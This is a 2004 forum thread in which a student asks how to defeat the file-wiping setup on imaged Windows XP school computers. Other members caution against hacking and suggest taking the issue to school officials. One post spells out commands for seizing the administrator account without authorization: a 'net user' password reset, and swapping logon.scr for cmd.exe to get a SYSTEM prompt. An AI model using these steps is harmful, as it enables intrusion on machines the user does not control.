1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

automatic data erase...

Discussion in 'All other topics' started by spectator, Dec 9, 2004.

1. spectator

spectator Member

im working on a computer that when you save something on the computer hard drive, it erases everything after restart. how did they do that? the only way to keep shit is if i save it to the desktop or my documents. so all im asking is how they did that and how to get rid of it? thx in advance..
    ++i have admin rights

Last edited: Dec 9, 2004
  2. ddp

ddp Moderator Staff Member

i'd say you have a virus in your startup, check msconfig

3. spectator

spectator Member

i cant reach start on my computers anyway. no my administrator is an ass and we cant save anything to the hard drive. its on all 44 computers. he did something so when did save something, once it was restarted/shut off, it erased everything...

4. ddp

have you tried safe mode

5. CJC

CJC Regular member

I take it you are at a public computer, such as a school/college or library etc...

They usually have automatic scripts that empty out Temporary Internet Files, Temporary Windows Files, Empty Recycle Bin, and clear partciluar folders.

Are you using a PC or MAC

If you are using a MAC, i know some Macs at schools do a basic Assimilate to a image storage on another computer, so as the computers are all the same.

And if you are using a PC, there could be a similar thing or could of changed a few windows settings to do this.

Generally Admin rights to the computer, you should be able to do pretty much everything, but the way it seems you only have Guest rights.

Basically unless you know where the settings are, it will be pretty hard for you to change this. Its done for a reason and its not just your school/college that does it.

Imagine every kid trying to save stuff there, the hard drives would become over filled and become a nuthouse lol.

CJC

6. spectator

spectator Member

the computers are windows xp pro.. without sp2. and yeah, they're imaged. all of our accounts are under the group "power users". nobody would know where to change the settings??? i can get admin rights, but when i change the password for administrator, & i restart or shut off the computer the administrator password is changed to the default, which i dont know. (i tried even tried no password!) and the files i put on there are still erased. so im completely lost.

oh if you wnated to konw how i changed the admin password this is how:

1. open up command prompt
    2. type:
    net user [administrator name here] [password desired]
    3. log off and log in with the password you created. if you get an "access denied" when in command prompt do the following:

1. open up command prompt
    2. type:
    cd\ ---->drops to root
    cd\windows\system32 ---->directs to the system32 dir
    mkdir temphack ---->creates the folder temphack
    copy logon.scr temphack\logon.scr ---->backsup logon.scr
    copy cmd.exe temphack\cmd.exe ---->backsup cmd.exe
    del logon.scr ---->deletes original logon.scr
    rename cmd.exe logon.scr ---->renames cmd.exe to logon.scr
    exit ---->quits dos
    3. log off and wait 15 minutes or so until a dos prompt appears, enter the same as step 2 from the first set of directions and then log in as administrator. if you get confused...post it here.

Last edited: Dec 11, 2004
  7. colw

colw Active member

It would appear to me that any prudent and knowledgable administrator would have systems and procedures in place to prevent hacking of system from puerile persons such as yourself.

There are normally very sound reasons to restrict what users can and cannot do on a shared system.

What is your motivation for attempting to hack the system?

8. spectator

spectator Member

the administrator does not allow certain programs we use for the class. our teacher says its ok that we use the programs, but he cant talk the administrator into letting us put our programs on there. my teacher told us we could, for one: we have not right-click. two: his class is based on what you want to do, so installing programs from home to school is what we want to do. im not being childish. its part of school. others and myself would fail otherwise.

Last edited: Dec 12, 2004
  9. ddp

i guess your whole class including teacher should have a talk with the administrator, the principal & the school board as if it is one class there are other classes in other schools affected by this problem

10. spectator

spectator Member

i'll try that

11. ddp

post result of meeting

12. spectator

spectator Member

ok, they said they are going to "discuss" it with the superintendent. but it doenst look good since the superintendent is a draconian. we have a snow day if his DOG will not go outside to go to the bathroom, he told us ourselves. its fucked up, it might be a joke, but with a foot of snow, we're still coming to school.

13. ddp

you can always go over him as somebody is his boss(es). if you have to do a petition with all the classes in all the schools affected by this problem & see what happens but have patiance

14. spectator

spectator Member

i've already started a petition. im still working on getting the paper more sig's...a work in progress i guess you could say, ive got about 70 (small school)...thanks for the help you guys didnt give me, j/k! :) thanks anyways guys...

15. ddp

good luck & patience!!!!